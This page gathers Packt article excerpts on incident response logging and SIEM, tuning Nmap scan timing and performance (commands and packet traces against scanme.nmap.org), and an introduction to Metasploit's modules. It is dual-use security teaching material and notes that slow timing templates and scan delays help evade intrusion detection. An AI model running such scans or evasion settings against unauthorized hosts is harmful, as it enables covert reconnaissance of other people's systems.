combination of network monitoring and rule sets to determine if there is malicious activity. Intrusion Detection Systems are often configured to alert to specific malicious activity while Intrusion Prevention Systems can detection but also block potential malicious activity. In either case, both types of platforms logs are an excellent place for incident responders to locate specific evidence on malicious activity. Web Proxy Servers: Organization often utilize Web Proxy Servers to control how users interact with websites and other internet based resources. As a result, these devices can give an enterprise wide picture of web traffic that both originates and is destined for internal hosts. Web proxies also have the additional feature set of alerting to connections to known malware Command and Control (C2) servers or websites that serve up malware. A review of web proxy logs in conjunction with a possible compromised host may identify a source of malicious traffic or a C2 server exerting control over the host. Domain Controllers / Authentication Servers: Serving the entire network domain, authentication servers are the primary location that incident responders can leverage for details on successful or unsuccessful logins, credential manipulation or other credential use. DHCP Server: Maintaining a list of assigned IP addresses to workstations or laptops within the organization requires an inordinate amount of upkeep. The use of Dynamic Host Configuration Protocol allows for the dynamic assignment of IP addresses to systems on the LAN. The DHCP servers often contain logs on the assignment of IP addresses mapped to the MAC address of the hosts NIC. This becomes important if an incident responder has to track down a specific workstation or laptop that was connected to the network at a specific data and time. Application Servers: A wide range of applications from Email to Web Applications is housed on network servers. Each of these can provide logs specific to the type of application. Network devices such as switches, routers and firewalls also have their own internal logs that maintain data on access and changes. Incident responders should become familiar with the types of network devices on their organization's network and also be able to access these logs in the event of an incident. Security information and Event management system A significant challenge that a great many organizations has is the nature of logging on network devices. With limited space, log files are often rolled over where the new log files are written over older log files. The result is that in some cases, an organization may only have a few days or even a few hours of important logs. If a potential incident happened several weeks ago, the incident response personnel will be without critical pieces of evidence. One tool that has been embraced by a number of enterprises is a Security Information and Event Management (SIEM) System. These appliances have the ability to aggregate log and event data from network sources and combine them into a single location. This allows the CSIRT and other security personnel to observe activity across the entire network without having to examine individual systems. The diagram below illustrates how a SIEM integrates into the overall network: A variety of sources from security controls to SQL databases are configured to send logs to the SIEM. In this case, the SQL database located at 10.100.20.18 indicates that the user account USSalesSyncAcct was utilized to copy a database to the remote host located at 10.88.6.12. The SIEM allows for quick examination of this type of activity. For example, if it is determined that the account USSalesSyncAcct had been compromised, CSIRT analysts can quickly query the SIEM for any usage of that account. From there, they would be able to see the log entry that indicated a copy of a database to the remote host. Without that SIEM, CSIRT analysts would have to search each individual system that might have been accessed, a process that may be prohibitive. From the SIEM platform, security and network analysts have the ability to perform a number of different tasks related to Incident Response: Log Aggregation: Typical enterprises have several thousand devices within the internal network, each with their own logs; the SIEM can be deployed to aggregate these logs in a central location. Log Retention: Another key feature that SIEM platforms provide is a platform to retain logs. Compliance frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) stipulate that logs should be maintained for a period of one year with 90 days immediately available. SIEM platforms can aid with log management by providing a system that archives logs in an orderly fashion and allows for the immediate retrieval. Routine Analysis: It is advisable with a SIEM platform to conduct period reviews of the information. SIEM platforms often provide a dashboard that highlights key elements such as the number of connections, data flow, and any critical alerts. SIEMs also allow for reporting so that stakeholders can keep informed of activity. Alerting: SIEM platforms have the ability to alert to specific conditions that may indicate malicious activity. This can include alerting from security controls such as anti-virus, Intrusion Prevention or Detection Systems. Another key feature of SIEM platforms is event correlation. This technique examines the log files and determines if there is a link or any commonality in the events. The SIEM then has the capability to alert on these types of events. For example, if a user account attempts multiple logins across a number of systems in the enterprise, the SIEM can identify that activity and alert to it. Incident Response: As the SIEM becomes the single point for log aggregation and analysis; CSIRT analysts will often make use of the SIEM during an incident. CSIRT analysis will often make queries on the platform as well as download logs for offline analysis. Because of the centralization of log files, the time to conduct searches and event collection is significantly reduced. For example, a CSIRT analysis has indicated a user account has been compromised. Without a SIEM, the CSIRT analyst would have to check various systems for any activity pertaining to that user account. With a SIEM in place, the analyst simply conducts a search of that user account on the SIEM platform, which has aggregated user account activity, logs from systems all over the enterprise. The result is the analyst has a clear idea of the user account activity in a fraction of the time it would have taken to examine logs from various systems throughout the enterprise. SIEM platforms do entail a good deal of time and money to purchase and implement. Adding to that cost is the constant upkeep, maintenance and modification to rules that is necessary. From an Incident Response perspective though, a properly configured and maintained SIEM is vital to gathering network-based evidence in a timely manner. In addition, the features and capability of SIEM platforms can significantly reduce the time it takes to determine a root cause of an incident once it has been detected. The following article has an excellent breakdown and use cases of SIEM platforms in enterprise environments: https://gbhackers.com/security-information-and-event-management-siem-a-detailed-explanation/. Security onion Full-featured SIEM platforms may be cost prohibitive for some organizations. One option that is available is the open source platform Security Onion. The Security Onion ties a wide range of security tools such as OSSEC, Suricata, and Snort into a single platform. Security Onion also has features such as dashboards and tools for deep analysis of log files. For example, the following screenshot shows the level of detail available: Although installing and deploying the Security Onion may require some resources in time, it is a powerful low cost alternative providing a solution to organizations that cannot deploy a full-featured SIEM solution. (The Security Onion platform and associated documentation is available at https://securityonion.net/). Summary Evidence that is pertinent to incident responders is not just located on the hard drive of a compromised host. There is a wealth of information available from network devices spread throughout the environment. With proper preparation, a CSIRT may be able to leverage the evidence provided by these devices through solutions such as a SIEM. CSIRT personnel also have the ability to capture the network traffic for later analysis through a variety of methods and tools. Behind all of these techniques though, is the legal and policy implications that CSIRT personnel and the organization at large needs to navigate. By preparing for the legal and technical challenges of network evidence collection, CSIRT members can leverage this evidence and move closer to the goal of determining the root cause of an incident and bringing the organization back up to operations. Resources for Article: Further resources on this subject: Selecting and Analyzing Digital Evidence [article] Digital and Mobile Forensics [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 12059

article-image-optimize-scans
Packt
23 Jun 2017
20 min read
Save for later

To Optimize Scans

Packt
23 Jun 2017
20 min read
In this article by Paulino Calderon Pale author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics: Skipping phases to speed up scans Selecting the correct timing template Adjusting timing parameters Adjusting performance parameters (For more resources related to this topic, see here.) One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful and need to understand the configuration options and scanning phases that can affect performance, but most importantly, really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add up to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets. This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can also not only improve performance but accuracy as well. Maybe those targets marked as offline were only too slow to respond to the probes sent after all. Skipping phases to speed up scans Nmap scans can be broken in phases. When we are working with many hosts, we can save up time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans. This explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans. How to do it... To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command: # nmap -T4 -n -Pn -p- 74.207.244.221 Note the scanning time at the end of the report: Nmap scan report for 74.207.244.221 Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds Now, compare the running time that we get if we don't skip any tests: # nmap -p- scanme.nmap.org Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, to consider the possibility of skipping some of the scanning phases that we will describe next. How it works... Nmap scans are divided in several phases. Some of them require some arguments to be set to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flag: Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups using only the IP addresses as targets. Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined. To skip the host discovery phase (no ping), use the flag -Pn. And we can easily see what probes we skipped by comparing the packet trace of the two scans: $ nmap -Pn -p80 -n --packet-trace scanme.nmap.org SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460> RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds For scanning without skipping host discovery, we use the command: $ nmap -p80 -n --packet-trace scanme.nmap.orgSENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28 SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460> SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024 SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40 RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28 SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460> RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds Reverse DNS resolution: Host names often reveal by themselves additional information and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments. Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to your command: $ nmap -n -Pn -p80 --packet-trace scanme.nmap.orgSENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460> RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http   Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds And if we try the same command but not' skipping reverse DNS resolution, as follows: $ nmap -Pn -p80 --packet-trace scanme.nmap.org NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 18 NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID                                                 34 NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID                                                 50 NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]:                                                 =............221.244.207.74.in-addr.arpa..... NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 66 NSOCK (0.0620s) nsi_delete() (IOD #1) NSOCK (0.0620s) msevent_cancel() on event #66 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #2) NSOCK (0.0620s) msevent_cancel() on event #34 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #3) NSOCK (0.0620s) msevent_cancel() on event #50 (type READ) SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 ip                                                 len=44 seq=1992555555 win=1024 <mss 1460> RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen                                                =44 seq=4229796359 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them like resolving their DNS names or checking whether they are online. For this reason, this phase can be skipped with the argument -sn: $ nmap -sn -R --packet-trace 74.207.244.221 SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28 SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460> SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024 SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40 RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0 NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18 NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34 NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50 NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa..... NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66 NSOCK (0.1660s) nsi_delete() (IOD #1) NSOCK (0.1660s) msevent_cancel() on event #66 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #2) NSOCK (0.1660s) msevent_cancel() on event #34 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #3) NSOCK (0.1660s) msevent_cancel() on event #50 (type READ) Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (We forced DNS lookups with the option -R), but no port scanning was done. There's more... I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command: # nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or scan the port and only perform a reverse DNS lookup: $ nmap -R -Pn -sn 74.207.244.221 Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Selecting the correct timing template Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network condition. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the more appropriate one. How to do it... Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what Nmap option -T4 sets: # nmap -T4 -d 192.168.4.20 --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- <Scan output removed for clarity> You may use the integers between 0 and 5, for example,-T[0-5]. How it works... The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments. The available timing templates and their initial configuration values are as follows: Paranoid(-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 300000, min 100, max 300000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 15000, min 100, max 15000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Polite (-2)—This template is used when scanning is not supposed to interfere with the target system, very conservative and safe setting: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Insane (-5)—This timing template sacrifices accuracy for speed: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 250, min 50, max 300 max-scan-delay: TCP 5, UDP 1000, SCTP 5 parallelism: min 0, max 0 max-retries: 2, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- There's more... An interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list; so far, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values(--max-rateand --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. Adjusting timing parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it can be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap. How to do it... Enter the following command to adjust the initial round trip timeout, the delay between probes and a time out for each scanned host: # nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 150, min 100, max 1250 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 6, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- How it works... Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine closer each timing parameter and learn its Nmap option parameter name. The Round Trip Time (RTT) value is used by Nmap to know when to give up or retransmit a probe response. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command: # nmap -A -p- --initial-rtt-timeout 150ms <target> In addition, you can set the minimum and maximum RTT timeout values with--min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command: # nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target> Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and maximum amount of time allowed to wait between probes, respectively, as shown in the following commands: # nmap -A --max-scan-delay 10s scanme.nmap.org # nmap -A --scan-delay 1s scanme.nmap.org Note that the arguments previously shown are very useful when avoiding detection mechanisms. Be careful not to set --max-scan-delay too low because it will most likely miss the ports that are open. There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout: # nmap -sV -A -p- --host-timeout 5m <target> Estimating round trip times with Nping To use Nping to estimate the round trip time taken between the target and you, the following command can be used: # nping -c30 <target> This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained: # nping -c30 scanme.nmap.org ... SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28 RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28 Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%) Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03 Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00 Nping done: 1 IP address pinged in 30.47 seconds Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for the --initial-rtt-timeout, and as high as four times the maximum round time value for the –max-rtt-timeout. Displaying the timing settings Enable debugging to make Nmap inform you about the timing settings before scanning: $ nmap -d<target> --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Adjusting performance parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect the behavior of Nmap, such as the number of hosts scanned concurrently, number of retries, and number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance. How to do it... Enter the following command, adjusting the values for your target condition: $ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> How it works... The command shown previously tells Nmap to scan and report by grouping no less than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2): # nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> It is important to note that setting these values incorrectly will most likely hurt the performance or accuracy rather than improve it. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of responsemeans; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind this sacrifices speed: $ nmap --max-retries 10<target> The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often would you like to see the scan results. Larger groups are optimalto improve performance, but you may prefer smaller host groups on slow networks: # nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target> There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present: # nmap -A -p- --min-rate 50 --max-rate 100 <target> Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically: # nmap -A --max-parallelism 1 <target> # nmap -A --min-parallelism 10 --max-parallelism 250 <target> There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command: # nmap -sV -A -p- --host-timeout 5m <target> Interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list, so far this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Summary In this article, we are finally able to learn how to implement and optimize scans. Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources. This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters! Resources for Article: Further resources on this subject: Introduction to Network Security Implementing OpenStack Networking and Security Communication and Network Security
Read more
  • 0
  • 0
  • 6743

article-image-getting-started-metasploit
Packt
22 Jun 2017
10 min read
Save for later

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on 